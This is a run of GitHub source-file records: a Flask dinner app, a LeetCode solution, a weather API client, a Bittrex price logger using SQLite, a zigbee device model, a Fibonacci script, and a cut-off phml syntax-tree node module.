wasted_water)","repo_name":"geodimitrov/Python-Advanced-SoftUni","sub_path":"Stacks-Queues/Exercises/10. cups_and_bottles.py","file_name":"10. cups_and_bottles.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31088853455","text":"from flask import Flask, render_template, request\nimport json\nimport sqlite3\nimport sys\nsys.path.append('/home/niko/Dev/Food/core')\n\nfrom Dinner import Dinner\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n return render_template(\"home.html\")\n\n\n@app.route('/getDinner', methods=['GET'])\ndef getDinner():\n connection = sqlite3.connect(\"lite.db\")\n dinner = Dinner(connection)\n item = dinner.getRandom()\n return json.dumps({'status': 'OK', 'data': {'item': item}})\n\n\n@app.route('/addDinner', methods=['POST'])\ndef addDinner():\n connection = sqlite3.connect(\"lite.db\")\n dinner = Dinner(connection)\n dinner.insert(request.form.get(\"newDinner\"))\n return json.dumps({'status': 'OK', 'data': request.form.get(\"newDinner\")})\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"nikoliukka/food","sub_path":"ui/website.py","file_name":"website.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11517438409","text":"class Solution(object):\n def minPathSum(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n if not grid:\n return 0\n for row in range(len(grid) - 1):\n grid[row+1][0] += grid[row][0]\n for col in range(len(grid[0]) - 1):\n grid[0][col+1] += grid[0][col]\n for row in range(1, len(grid)):\n for col in range(1, len(grid[0])):\n grid[row][col] += min(grid[row][col - 1], grid[row - 1][col])\n return grid[-1][-1]\n","repo_name":"jackyhobingo/LeetCode","sub_path":"64.Minimum_Path_Sum.py","file_name":"64.Minimum_Path_Sum.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72008097793","text":"import datetime\nimport os\nimport statistics\n\nimport requests\n\n\nWEATHER_API_KEY = os.environ['WEATHER_API_KEY']\nBASE_WEATHER_API_URL = os.environ['BASE_WEATHER_API_URL']\n\ndef extract_hourly_temps(day):\n \"\"\"\n Extract hourly temps for the day and return as list.\n \"\"\"\n temps = []\n for hour in day['hour']:\n temps.append(hour['temp_c'])\n return temps\n\ndef fetch_city_weather(city, days):\n \"\"\"\n Fetch city weather data from weatherapi.com\n \"\"\"\n end_date = datetime.datetime.now().date()\n start_date = end_date - datetime.timedelta(days=days)\n\n params = {\n 'dt': start_date,\n 'end_dt': end_date,\n 'q': city,\n 'key': WEATHER_API_KEY\n }\n return requests.get(BASE_WEATHER_API_URL, params=params)\n\ndef calculate_temps(city, days=0):\n \"\"\"\n Calculates maximum, minimum, average and medium temps from hourly data\n collected over a range of `days`.\n \"\"\"\n response = fetch_city_weather(city, days)\n if response.status_code != 200:\n return response.json(), response.status_code\n json_resp = response.json()\n forecast_day = json_resp['forecast']['forecastday']\n all_hourly_temps = []\n for day in forecast_day:\n temps = extract_hourly_temps(day)\n all_hourly_temps.extend(temps)\n maximum = max(all_hourly_temps)\n minimum = min(all_hourly_temps)\n average = statistics.mean(all_hourly_temps)\n median = statistics.median(all_hourly_temps)\n return {\n 'maximum': maximum,\n 'minimum': minimum,\n 'average': average,\n 'median': median\n }, response.status_code\n","repo_name":"sitati-elsis/weather-api","sub_path":"api/services/weatherapi.py","file_name":"weatherapi.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22937144641","text":"\"Definition of devices.\"\n\nfrom abc import ABC, abstractmethod\n\nfrom comm import Topic\nfrom enums import DeviceKind, DeviceModel, Vendor\n\nTOPIC_BASE = \"zigbee2mqtt\"\n\n\nclass Addressable(ABC):\n \"Marks an entity as addressable.\"\n\n def __init__(self):\n pass\n\n @property\n @abstractmethod\n def topic(self) -> Topic:\n \"Returns the topic to address this entity\"\n\n\nclass Device(Addressable, ABC):\n \"Represents a generic device\"\n\n def __init__(\n self,\n name: str,\n room: str,\n model: DeviceModel,\n ident: str,\n icon: str,\n ):\n self.name = name\n self.room = room\n self.model = model\n self.ident = ident\n self.icon = icon\n self._topic = Topic.for_device(\n name=self.name,\n kind=self.model.kind,\n room=self.room,\n groups=[]\n )\n\n @property\n def vendor(self) -> Vendor:\n \"Specifies the vendor of the device, Ikea or Hue.\"\n return self.model.vendor\n\n @property\n def kind(self) -> DeviceKind:\n \"Specifies the physical kind of the device.\"\n return self.model.kind\n\n @property\n def topic(self) -> Topic:\n return self._topic\n\n def set_topic(self) -> str:\n \"Creates a set-topic for the device\"\n return self.topic.as_set()\n\n def get_topic(self) -> str:\n \"Creates a set-topic for the device\"\n return self.topic.as_get()\n","repo_name":"Schwenger/PiPyHomeBridge","sub_path":"homebase/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36037759365","text":"import sqlite3\nimport time\nimport os.path\nimport requests\n\n\nclass bittrexStream(object):\n def __init__(self, baseCurrency = 'BTC', db='bittrex.db', url = 'https://bittrex.com/api/v1.1/public/getmarketsummaries'):\n '''\n Get % change from Bittrex\n '''\n self.url = url\n print(self.url)\n\n self.base = baseCurrency\n data = requests.get(self.url).json()\n self.pairs = []\n self.pairlist = []\n self.insert_price = None\n self.insert_volume = None\n self.insert_ask = None\n self.insert_bid = None\n\n # fill up the pairs to stream, according to base currency\n for p in range(len(data['result'])):\n thispair = data['result'][p]['MarketName']\n if thispair[0:3] == self.base:\n # this replacement has to be done for the sqlite database...\n self.pairlist.append(thispair)\n thispair = thispair.replace('-','_')\n print(thispair)\n self.pairs.append(thispair)\n\n self.pair_vector = self.pairs[0] + ' REAL'\n for p in range(1,len(self.pairs)):\n self.pair_vector += ', '+ self.pairs[p] + ' REAL'\n\n self.col_vector=self.pairs[0]\n for p in range(1,len(self.pairs)):\n self.col_vector += ', '+ self.pairs[p]\n\n self.col_vector = 'UNIX_Time, ' + self.col_vector\n self.columns = 'UNIX_Time, ' + self.pair_vector\n\n self.path = db\n\n # checks if the table in the database is already existing, otherwise creates a table\n if (os.path.exists(self.path)):\n print('Open table')\n conn = sqlite3.connect(self.path)\n c = conn.cursor()\n price_string = 'CREATE TABLE IF NOT EXISTS BTC_PAIRS_PRICE (UNIX_Time INT, ' + self.pair_vector + ')'\n volume_string = 'CREATE TABLE IF NOT EXISTS BTC_PAIRS_VOLUME (UNIX_Time INT, ' + self.pair_vector + ')'\n ask_string = 'CREATE TABLE IF NOT EXISTS BTC_PAIRS_ASK (UNIX_Time INT, ' + self.pair_vector + ')'\n bid_string = 'CREATE TABLE IF NOT EXISTS BTC_PAIRS_BID (UNIX_Time INT, ' + self.pair_vector + ')'\n #print(price_string)\n c.execute(price_string)\n c.execute(volume_string)\n c.execute(ask_string)\n c.execute(bid_string)\n conn.commit()\n conn.close()\n else:\n print(\"create your data base first!\")\n\n def getTicker(self):\n # fetch the data from the exchange\n try:\n data = requests.get(self.url).json()['result']\n except ValueError:\n print('There was a ValueError in getTicker')\n time.sleep(60)\n return self.getTicker()\n return data\n\n\n def updateDB(self):\n data_all = self.getTicker()\n price_vec = ''\n volume_vec = ''\n ask_vec = ''\n bid_vec = ''\n bittrex_coinlist = []\n index_list = []\n # if Bittrex adds a new coin pari you would get an error in your database.\n # So, generate index_list of the current BTC-pairs from bittrex which are in your database\n\n for i in range(0, len(data_all)):\n bittrex_coinlist.append(data_all[i]['MarketName'])\n\n coins_dict = {key: [0, 0, 0, 0] for (key) in self.pairlist}\n for idx, coin in enumerate(self.pairlist):\n for i in range(0, len(data_all)):\n coins_passed = 0\n if coin == data_all[i]['MarketName']:\n coins_dict[coin][0] = data_all[i]['Last']\n coins_dict[coin][1] = data_all[i]['BaseVolume']\n coins_dict[coin][2] = data_all[i]['Ask']\n coins_dict[coin][3] = data_all[i]['Bid']\n\n\n # compose the SQL data vector\n for id, coin in enumerate(self.pairlist):\n if id < len(self.pairlist) - 1:\n price_vec += str(coins_dict[coin][0]) + ','\n volume_vec += str(coins_dict[coin][1]) + ','\n ask_vec += str(coins_dict[coin][2]) + ','\n bid_vec += str(coins_dict[coin][3]) + ','\n else:\n # do not add ',' to the last entry\n price_vec += str(coins_dict[coin][0])\n volume_vec += str(coins_dict[coin][1])\n ask_vec += str(coins_dict[coin][2])\n bid_vec += str(coins_dict[coin][3])\n\n date = time.strftime(\"%m.%d.%y_%H:%M:%S\", time.localtime())\n unixtime = int(time.time())\n\n # string vectors to update the sql database\n self.insert_price = \"INSERT INTO BTC_PAIRS_PRICE (\" + self.col_vector + \") \" + \" VALUES (\" + str(unixtime) + \",\" + price_vec + \")\"\n self.insert_volume = \"INSERT INTO BTC_PAIRS_VOLUME (\" + self.col_vector + \") \" + \" VALUES (\" + str(unixtime) + \",\" + volume_vec + \")\"\n self.insert_ask = \"INSERT INTO BTC_PAIRS_ASK (\" + self.col_vector + \") \" + \" VALUES (\" + str(unixtime) + \",\" + ask_vec + \")\"\n self.insert_bid = \"INSERT INTO BTC_PAIRS_BID (\" + self.col_vector + \") \" + \" VALUES (\" + str(unixtime) + \",\" + bid_vec + \")\"\n\n # connect to DB\n conn = sqlite3.connect(self.path)\n c = conn.cursor()\n c.execute(self.insert_price)\n c.execute(self.insert_volume)\n c.execute(self.insert_ask)\n c.execute(self.insert_bid)\n conn.commit()\n conn.close()\n print('Update the data base at ' + str(date))\n","repo_name":"mhansinger/CryptoDB","sub_path":"bittrexStream.py","file_name":"bittrexStream.py","file_ext":"py","file_size_in_byte":5454,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"43833153473","text":"n = int(input(\"Please enter a number: \"))\ndic = {0: 0, 1: 1}\n\n\ndef fab(n1):\n if n1 in dic:\n return dic[n1]\n else:\n temp = fab(n1 - 1) + fab(n1 - 2)\n dic[n1] = temp\n return temp\n\n\nfor i in range(n):\n print(fab(i + 1), end=\" \")\n","repo_name":"amazing-2020/pdf","sub_path":"Python/code case/code case 19.py","file_name":"code case 19.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25846153740","text":"from __future__ import annotations\n\nfrom enum import StrEnum, unique\nfrom types import NoneType\nfrom typing import Any, Iterator, NoReturn, TypeAlias, overload\n\nfrom saimll import SAIML\n\nAttribute: TypeAlias = str | bool\n\n\nclass Missing:\n pass\n\n\nMISSING = Missing()\n\n\ndef p_code(value) -> str: # pragma: no cover\n \"\"\"Get python code representation of phml nodes.\"\"\"\n if value is None:\n return \"None\"\n return value.__p_code__()\n\n\n@unique\nclass LiteralType(StrEnum):\n Text = \"text\"\n Comment = \"comment\"\n\n @staticmethod\n def From(type: str) -> str:\n types = [\"text\", \"comment\"]\n if type in types:\n return type\n raise ValueError(f\"Expected on of {', '.join(types)}\")\n\n\n@unique\nclass NodeType(StrEnum):\n AST = \"ast\"\n ELEMENT = \"element\"\n LITERAL = \"literal\"\n\n\nclass Point:\n \"\"\"Represents one place in a source file.\n\n The line field (1-indexed integer) represents a line in a source file. The column field\n (1-indexed integer) represents a column in a source file. The offset field (0-indexed integer)\n represents a character in a source file.\n \"\"\"\n\n def __init__(self, line: int, column: int) -> None:\n if line is None or line < 0:\n raise IndexError(f\"Point.line must be >= 0 but was {line}\")\n\n self.line = line\n\n if column is None or column < 0:\n raise IndexError(f\"Point.column must be >= 0 but was {column}\")\n\n self.column = column\n\n def __eq__(self, _o) -> bool:\n return (\n isinstance(_o, self.__class__)\n and _o.line == self.line\n and _o.column == self.column\n )\n\n @staticmethod\n def from_dict(data: dict) -> Point:\n return Point(data[\"line\"], data[\"column\"])\n\n def __p_code__(self) -> str:\n return f\"Point({self.line}, {self.column})\"\n\n def __repr__(self) -> str:\n return f\"{self.line}:{self.column}\"\n\n def __str__(self) -> str:\n return f\"\\x1b[38;5;244m{self.line}:{self.column}\\x1b[39m\"\n\n\nclass Position:\n \"\"\"Position represents the location of a node in a source file.\n\n The `start` field of `Position` represents the place of the first character\n of the parsed source region. The `end` field of Position represents the place\n of the first character after the parsed source region, whether it exists or not.\n The value of the `start` and `end` fields implement the `Point` interface.\n\n The `indent` field of `Position` represents the start column at each index\n (plus start line) in the source region, for elements that span multiple lines.\n\n If the syntactic unit represented by a node is not present in the source file at\n the time of parsing, the node is said to be `generated` and it must not have positional\n information.\n \"\"\"\n\n @overload\n def __init__(\n self,\n start: Point,\n end: Point,\n ) -> None:\n \"\"\"\n Args:\n start (tuple[int, int, int | None]): Tuple representing the line, column, and optional\n offset of the start point.\n end (tuple[int, int, int | None]): Tuple representing the line, column, and optional\n offset of the end point.\n indent (Optional[int], optional): The indent amount for the start of the position.\n \"\"\"\n ...\n\n @overload\n def __init__(\n self,\n start: tuple[int, int],\n end: tuple[int, int],\n ) -> None:\n \"\"\"\n Args:\n start (tuple[int, int, int | None]): Tuple representing the line, column, and optional\n offset of the start point.\n end (tuple[int, int, int | None]): Tuple representing the line, column, and optional\n offset of the end point.\n indent (Optional[int], optional): The indent amount for the start of the position.\n \"\"\"\n ...\n\n def __init__(self, start: Point | tuple[int, int], end: Point | tuple[int, int]):\n \"\"\"\n Args:\n start (Point): Starting point of the position.\n end (Point): End point of the position.\n indent (int | None): The indent amount for the start of the position.\n \"\"\"\n\n self.start = Point(start[0], start[1]) if isinstance(start, tuple) else start\n self.end = Point(end[0], end[1]) if isinstance(end, tuple) else end\n\n def __p_code__(self) -> str:\n return f\"Position({p_code(self.start)}, {p_code(self.end)})\"\n\n def __eq__(self, _o):\n return (\n isinstance(_o, Position) and _o.start == self.start and _o.end == self.end\n )\n\n @staticmethod\n def from_pos(pos: Position) -> Position:\n \"\"\"Create a new position from another position object.\"\"\"\n return Position(\n (pos.start.line, pos.start.column),\n (pos.end.line, pos.end.column),\n )\n\n @staticmethod\n def from_dict(data: dict) -> Position | None:\n if data is None:\n return None\n return Position(Point.from_dict(data[\"start\"]), Point.from_dict(data[\"end\"]))\n\n def as_dict(self) -> dict:\n \"\"\"Convert the position object to a dict.\"\"\"\n return {\n \"start\": {\n \"line\": self.start.line,\n \"column\": self.start.column,\n },\n \"end\": {\n \"line\": self.end.line,\n \"column\": self.end.column,\n },\n }\n\n def __repr__(self) -> str:\n # indent = f\" ~ {self.indent}\" if self.indent is not None else \"\"\n return f\"<{self.start!r}-{self.end!r}>\"\n\n def __str__(self) -> str:\n return f\"\\x1b[38;5;8m<\\x1b[39m{self.start}\\x1b[38;5;8m-\\x1b[39m{self.end}\\x1b[38;5;8m>\\x1b[39m\"\n\n\nclass Node:\n \"\"\"Base phml node. Defines a type and basic interactions.\"\"\"\n\n def __init__(\n self,\n _type: NodeType,\n position: Position | None = None,\n parent: Parent | None = None,\n in_pre: bool = False,\n ) -> None:\n self._position = position\n self.parent = parent\n self._type = _type\n self.in_pre = in_pre\n\n def __p_code__(self) -> str:\n in_pre = f\", in_pre={self.in_pre}\" if self.in_pre else \"\"\n return f\"Node({self.type!r}, position={p_code(self.position)}{in_pre})\"\n\n def __eq__(self, _o):\n return (\n isinstance(_o, self.__class__)\n and self.type == _o.type\n and self.in_pre == _o.in_pre\n )\n\n def as_dict(self) -> dict:\n return {\n \"type\": str(self._type),\n }\n\n @staticmethod\n def from_dict(data: dict, in_pre: bool = False):\n if data[\"type\"] == NodeType.AST:\n ast = AST(\n children=[] if data[\"children\"] is not None else None,\n )\n if data[\"children\"] is not None:\n for child in data[\"children\"]:\n ast.append(Node.from_dict(child, in_pre))\n return ast\n elif data[\"type\"] == NodeType.ELEMENT:\n return Element.from_dict(data)\n elif data[\"type\"] == NodeType.LITERAL:\n return Literal(\n LiteralType.From(data[\"name\"]),\n data[\"content\"],\n )\n raise ValueError(\n f\"Phml ast dicts must have nodes with the following types: {NodeType.AST}, {NodeType.ELEMENT}, {NodeType.LITERAL}\",\n )\n\n @property\n def position(self) -> Position | None:\n \"\"\"The position of the node in the parsed phml text.\n Is `None` if the node was generated.\n \"\"\"\n return self._position\n\n @property\n def type(self) -> str:\n \"\"\"The node type. Either root, element, or litera.\"\"\"\n return self._type\n\n def pos_as_str(self, color: bool = False) -> str: # pragma: no cover\n \"\"\"Return the position formatted as a string.\"\"\"\n\n position = \"\"\n if self.position is not None:\n if color:\n start = self.position.start\n end = self.position.end\n position = SAIML.parse(\n f\"<[@F244]{start.line}[@F]-[@F244]{start.column}[@F]\"\n f\":[@F244]{end.line}[@F]-[@F244]{end.column}[@F]>\",\n )\n else:\n start = self.position.start\n end = self.position.end\n position = f\"<{start.line}-{start.column}:{end.line}-{end.column}>\"\n return position\n\n def __repr__(self) -> str:\n return f\"{self.type}()\"\n\n def __format__(self, indent: int = 0, color: bool = False, text: bool = False):\n if color:\n return (\n SAIML.parse(f\"{' '*indent}[@Fred]{self.type}[@F]\")\n + f\" {self.pos_as_str(True)}\"\n )\n return f\"{' '*indent}{self.type} {self.pos_as_str()}\"\n\n def __str__(self) -> str:\n return self.__format__()\n\n\nclass Parent(Node):\n def __init__(\n self,\n _type: NodeType,\n children: list[Node] | None,\n position: Position | None = None,\n parent: Parent | None = None,\n in_pre: bool = False,\n ) -> None:\n super().__init__(_type, position, parent, in_pre)\n self.children = [] if children is not None else None\n\n if children is not None:\n self.extend(children)\n\n def __p_code__(self) -> str:\n children = (\n \"None\"\n if self.children is None\n else f\"[{', '.join([p_code(child) for child in self])}]\"\n )\n in_pre = f\", in_pre={self.in_pre}\" if self.in_pre else \"\"\n return f\"Parent({self.type!r}, position={p_code(self.position)}{in_pre}, children={children})\"\n\n def __iter__(self) -> Iterator[Parent | Literal]:\n if self.children is not None:\n yield from self.children\n\n @overload\n def __setitem__(self, key: int, value: Node) -> NoReturn:\n ...\n\n @overload\n def __setitem__(self, key: slice, value: list) -> NoReturn:\n ...\n\n def __setitem__(self, key: int | slice, value: Node | list):\n if self.children is not None:\n if isinstance(key, int):\n if not isinstance(value, Node):\n raise ValueError(\n \"Can not assign value that is not phml.Node to children\",\n )\n value.parent = self\n self.children[key] = value\n elif isinstance(key, slice):\n if not isinstance(value, list):\n raise ValueError(\n \"Can not assign value that is not list[phml.Node] to slice of children\",\n )\n for v in value:\n v.parent = self\n self.children[key] = value\n else:\n raise ValueError(\"Invalid value type. Expected phml Node\")\n\n @overload\n def __getitem__(self, _k: int) -> Parent | Literal:\n ...\n\n @overload\n def __getitem__(self, _k: slice) -> list[Parent | Literal]:\n ...\n\n def __getitem__(\n self,\n key: int | slice,\n ) -> Parent | Literal | list[Parent | Literal]:\n if self.children is not None:\n return self.children[key]\n raise ValueError(\"A self closing element can not be indexed\")\n\n @overload\n def __delitem__(self, key: int) -> NoReturn:\n ...\n\n @overload\n def __delitem__(self, key: slice) -> NoReturn:\n ...\n\n def __delitem__(self, key: int | slice):\n if self.children is not None:\n del self.children[key]\n else:\n raise ValueError(\"Can not use del for a self closing elements children\")\n\n def pop(self, idx: int = 0) -> Node:\n \"\"\"Pop a node from the children. Defaults to index 0\"\"\"\n if self.children is not None:\n return self.children.pop(idx)\n raise ValueError(\"A self closing element can not pop a child node\")\n\n def index(self, node: Node) -> int:\n \"\"\"Get the index of a node in the children.\"\"\"\n if self.children is not None:\n return self.children.index(node)\n raise ValueError(\"A self closing element can not be indexed\")\n\n def append(self, node: Node):\n \"\"\"Append a child node to the end of the children.\"\"\"\n if self.children is not None:\n node.parent = self\n self.children.append(node)\n else:\n raise ValueError(\n \"A child node can not be appended to a self closing element\",\n )\n\n def extend(self, nodes: list):\n \"\"\"Extend the children with a list of nodes.\"\"\"\n if self.children is not None:\n for child in nodes:\n child.parent = self\n self.children.extend(nodes)\n else:\n raise ValueError(\n \"A self closing element can not have it's children extended\",\n )\n\n def insert(self, index: int, nodes: Node | list):\n \"\"\"Insert a child node or nodes into a specific index of the children.\"\"\"\n if self.children is not None:\n if isinstance(nodes, list):\n for n in nodes:\n n.parent = self\n self.children[index:index] = nodes\n else:\n self.children.insert(index, nodes)\n else:\n raise ValueError(\n \"A child node can not be inserted into a self closing element\",\n )\n\n def remove(self, node: Node):\n \"\"\"Remove a child node from the children.\"\"\"\n if self.children is None:\n raise ValueError(\n \"A child node can not be removed from a self closing element.\",\n )\n self.children.remove(node)\n\n def len_as_str(self, color: bool = False) -> str: # pragma: no cover\n if color:\n return SAIML.parse(\n f\"[@F66]{len(self) if self.children is not None else '/'}[@F]\",\n )\n return f\"{len(self) if self.children is not None else '/'}\"\n\n def __len__(self) -> int:\n return len(self.children) if self.children is not None else 0\n\n def __repr__(self) -> str:\n return f\"{self.type}(cldrn={self.len_as_str()})\"\n\n def __format__(self, indent: int = 0, color: bool = False, text: bool = False):\n output = [f\"{' '*indent}{self.type} [{self.len_as_str()}]{self.pos_as_str()}\"]\n if color:\n output[0] = (\n SAIML.parse(f\"{' '*indent}[@Fred]{self.type}[@F]\")\n + f\" [{self.len_as_str(True)}]\"\n + f\" {self.pos_as_str(True)}\"\n )\n for child in self.children or []:\n output.extend(child.__format__(indent=indent + 2, color=color, text=text))\n return output\n\n def __str__(self) -> str:\n return \"\\n\".join(self.__format__())\n\n def as_dict(self) -> dict:\n return {\n \"children\": [child.as_dict() for child in self.children]\n if self.children is not None\n else None,\n **super().as_dict(),\n }\n\n\nclass AST(Parent):\n def __init__(\n self,\n children: list[Node] | None = None,\n position: Position | None = None,\n in_pre: bool = False,\n ) -> None:\n super().__init__(NodeType.AST, children or [], position, None, in_pre)\n\n def __eq__(self, _o):\n return isinstance(_o, AST) and (\n (_o.children is None and self.children is None)\n or (len(_o) == len(self) and all(c1 == c2 for c1, c2 in zip(_o, self)))\n )\n\n def __p_code__(self) -> str:\n children = (\n \"None\"\n if self.children is None\n else f\"[{', '.join([p_code(child) for child in self])}]\"\n )\n in_pre = f\", in_pre={self.in_pre}\" if self.in_pre else \"\"\n return f\"AST(position={p_code(self.position)}, children={children}{in_pre})\"\n\n\nclass Element(Parent):\n def __init__(\n self,\n tag: str,\n attributes: dict[str, Attribute] | None = None,\n children: list[Node] | None = None,\n position: Position | None = None,\n parent: Parent | None = None,\n in_pre: bool = False,\n ) -> None:\n super().__init__(NodeType.ELEMENT, children, position, parent, in_pre)\n self.tag = tag\n self.attributes = attributes or {}\n self.context = {}\n\n def __p_code__(self) -> str:\n children = (\n \"None\"\n if self.children is None\n else f\"[{', '.join([p_code(child) for child in self])}]\"\n )\n in_pre = f\", in_pre={self.in_pre}\" if self.in_pre else \"\"\n return f\"Element({self.tag!r}, position={p_code(self.position)}, attributes={self.attributes}, children={children}{in_pre})\"\n\n def __eq__(self, _o) -> bool:\n return (\n isinstance(_o, Element)\n and _o.tag == self.tag\n and (\n len(self.attributes) == len(_o.attributes)\n and all(key in self.attributes for key in _o.attributes)\n and all(\n _o.attributes[key] == value\n for key, value in self.attributes.items()\n )\n )\n and (\n (_o.children is None and self.children is None)\n or (len(_o) == len(self) and all(c1 == c2 for c1, c2 in zip(_o, self)))\n )\n )\n\n def as_dict(self) -> dict:\n return {\"tag\": self.tag, \"attributes\": self.attributes, **super().as_dict()}\n\n @staticmethod\n def from_dict(data: dict, in_pre: bool = False) -> Element:\n element = Element(\n data[\"tag\"],\n attributes=data[\"attributes\"],\n children=[] if data[\"children\"] is not None else None,\n )\n if data[\"children\"] is not None:\n element.children = [\n Node.from_dict(child, in_pre or data[\"tag\"] == \"pre\")\n for child in data[\"children\"]\n ]\n return element\n\n @property\n def tag_path(self) -> list[str]:\n \"\"\"Get the list of all the tags to the current element. Inclusive.\"\"\"\n path = [self.tag]\n parent = self\n while isinstance(parent.parent, Element):\n path.append(parent.parent.tag)\n parent = parent.parent\n\n path.reverse()\n return path\n\n def __hash__(self) -> int:\n return (\n hash(self.tag)\n + sum(hash(attr) for attr in self.attributes.values())\n + hash(len(self))\n )\n\n def __contains__(self, _k: str) -> bool:\n return _k in self.attributes\n\n @overload\n def __getitem__(self, _k: int) -> Parent | Literal:\n ...\n\n @overload\n def __getitem__(self, _k: str) -> Attribute:\n ...\n\n @overload\n def __getitem__(self, _k: slice) -> list[Parent | Literal]:\n ...\n\n def __getitem__(\n self,\n _k: str | int | slice,\n ) -> Attribute | Parent | Literal | list[Parent | Literal]:\n if isinstance(_k, str):\n return self.attributes[_k]\n\n if self.children is not None:\n return self.children[_k]\n\n raise ValueError(\"A self closing element can not have it's children indexed\")\n\n @overload\n def __setitem__(self, key: int, value: Node) -> NoReturn:\n ...\n\n @overload\n def __setitem__(self, key: slice, value: list) -> NoReturn:\n ...\n\n @overload\n def __setitem__(self, key: str, value: Attribute) -> NoReturn:\n ...\n\n def __setitem__(self, key: str | int | slice, value: Attribute | Node | list):\n if isinstance(key, str) and isinstance(value, Attribute):\n self.attributes[key] = value\n elif self.children is not None:\n if isinstance(key, int) and isinstance(value, Node):\n value.parent = self\n self.children[key] = value\n elif isinstance(key, slice) and isinstance(value, list):\n for child in value:\n child.parent = self\n self.children[key] = value\n else:\n raise ValueError(\n \"A self closing element can not have a subset of it's children assigned to\",\n )\n\n @overload\n def __delitem__(self, key: int) -> NoReturn:\n ...\n\n @overload\n def __delitem__(self, key: slice) -> NoReturn:\n ...\n\n @overload\n def __delitem__(self, key: str) -> NoReturn:\n ...\n\n def __delitem__(self, key: str | int | slice):\n if isinstance(key, str):\n del self.attributes[key]\n elif self.children is not None:\n del self.children[key]\n else:\n raise ValueError(\"Can not use del for a self closing elements children\")\n\n @overload\n def pop(self, idx: int = 0) -> Node:\n ...\n\n @overload\n def pop(self, idx: str, _default: Any = MISSING) -> Attribute:\n ...\n\n def pop(self, idx: str | int = 0, _default: Any = MISSING) -> Attribute | Node:\n \"\"\"Pop a specific attribute from the elements attributes. A default value\n can be provided for when the value is not found, otherwise an error is thrown.\n \"\"\"\n if isinstance(idx, str):\n if _default != MISSING:\n return self.attributes.pop(idx, _default)\n return self.attributes.pop(idx)\n if self.children is not None:\n return self.children.pop(idx)\n\n raise ValueError(\"A self closing element can not pop a child node\")\n\n def get(self, key: str, _default: Any = MISSING) -> Attribute:\n \"\"\"Get a specific element attribute. Returns `None` if not found\n unless `_default` is defined.\n\n Args:\n key (str): The name of the attribute to retrieve.\n _default (str|bool): The default value to return if the key\n isn't an attribute.\n\n Returns:\n str|bool|None: str or bool if the attribute exists or a default\n was provided, else None\n \"\"\"\n if not isinstance(_default, (Attribute, NoneType)) and _default != MISSING:\n raise TypeError(\"_default value must be str, bool, or MISSING\")\n\n if key in self:\n return self[key]\n if _default != MISSING:\n return _default\n raise ValueError(f\"Attribute {key!r} not found\")\n\n def attrs_as_str(self, indent: int, color: bool = False) -> str: # pragma: no cover\n \"\"\"Return a str representation of the attributes\"\"\"\n if color:\n attrs = (\n (\n f\"\\n{' '*(indent)}▸ \"\n + f\"\\n{' '*(indent)}▸ \".join(\n str(key)\n + \": \"\n + (\n f\"\\x1b[32m{value!r}\\x1b[39m\"\n if isinstance(value, str)\n else f\"\\x1b[35m{value}\\x1b[39m\"\n )\n for key, value in self.attributes.items()\n )\n )\n if len(self.attributes) > 0\n else \"\"\n )\n else:\n attrs = (\n (\n f\"\\n{' '*(indent)}▸ \"\n + f\"\\n{' '*(indent)}▸ \".join(\n f\"{key}: {value!r}\" for key, value in self.attributes.items()\n )\n )\n if len(self.attributes) > 0\n else \"\"\n )\n\n return attrs\n\n def __repr__(self) -> str:\n return f\"{self.type}.{self.tag}(cldrn={self.len_as_str()}, attrs={self.attributes})\"\n\n def __format__(\n self,\n indent: int = 0,\n color: bool = False,\n text: bool = False,\n ) -> list[str]: # pragma: no cover\n output: list[str] = []\n if color:\n output.append(\n f\"{' '*indent}\"\n + SAIML.parse(f\"[@Fred]{self.type}[@F]\" + f\".[@Fblue]{self.tag}[@F]\")\n + f\" [{self.len_as_str(True)}]\"\n + f\" {self.pos_as_str(True)}\"\n + f\"{self.attrs_as_str(indent+2, True)}\",\n )\n else:\n output.append(\n f\"{' '*indent}{self.type}.{self.tag}\"\n + f\" [{self.len_as_str()}]{self.pos_as_str()}{self.attrs_as_str(indent+2)}\",\n )\n\n for child in self.children or []:\n output.extend(child.__format__(indent=indent + 2, color=color, text=text))\n return output\n\n def __str__(self) -> str:\n return \"\\n\".join(self.__format__())\n\n\nclass Literal(Node):\n def __init__(\n self,\n name: str,\n content: str,\n parent: Parent | None = None,\n position: Position | None = None,\n in_pre: bool = False,\n ) -> None:\n super().__init__(NodeType.LITERAL, position, parent, in_pre)\n self.name = name\n self.content = content\n\n def __hash__(self) -> int:\n return hash(self.content) + hash(str(self.name))\n\n def __p_code__(self) -> str:\n in_pre = \", in_pre=True\" if self.in_pre else \"\"\n return f\"Literal({str(self.name)!r}, {self.content!r}{in_pre})\"\n\n def __eq__(self, _o) -> bool:\n return (\n isinstance(_o, Literal)\n and _o.type == self.type\n and self.name == _o.name\n and self.content == _o.content\n )\n\n def as_dict(self) -> dict:\n return {\"name\": str(self.name), \"content\": self.content, **super().as_dict()}\n\n @staticmethod\n def is_text(node: Node) -> bool:\n \"\"\"Check if a node is a literal and a text node.\"\"\"\n return isinstance(node, Literal) and node.name == LiteralType.Text\n\n @staticmethod\n def is_comment(node: Node) -> bool:\n \"\"\"Check if a node is a literal and a comment.\"\"\"\n return isinstance(node, Literal) and node.name == LiteralType.Comment\n\n def __repr__(self) -> str: # pragma: no cover\n return f\"{self.type}.{self.name}(len={len(self.content)})\"\n\n def __format__(\n self,\n indent: int = 0,\n color: bool = False,\n text: bool = False,\n ): # pragma: no cover\n from .helpers import 